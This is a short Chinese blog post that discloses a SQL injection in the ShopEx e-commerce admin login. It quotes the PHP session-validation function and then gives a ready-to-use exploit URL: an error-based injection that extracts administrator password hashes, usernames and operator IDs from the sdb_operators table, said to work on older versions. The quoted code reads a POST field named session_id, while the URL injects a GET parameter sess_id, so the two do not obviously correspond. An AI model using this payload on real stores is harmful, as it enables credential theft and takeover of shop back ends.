shopex最新后台页面注入

在\shopex\core\admin\controller\ctl.passport.php中跟踪后台登陆验证流程

[php]
function certi_validate(){
$cert = $this->system->loadModel('service/certificate');
$sess_id = $_POST['session_id'];

$return = array();
if($sess_id == $cert->get_sess()){
$return = array(
'res' => 'succ',
'msg' => '',
'info' => ''
);

echo json_encode($return);
}else{
$return = array(
'res' => 'fail',
'msg' => '000001',
'info' => 'You have the different session!'
);

echo json_encode($return);
}
}[/php]
在参数sess_id传递的时候没有做任何的处理,直接带入查询了。

给出exp:
[php]http://www.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1[/php]

表示不是通杀。低版本有效。
转载请注明版权。

发表评论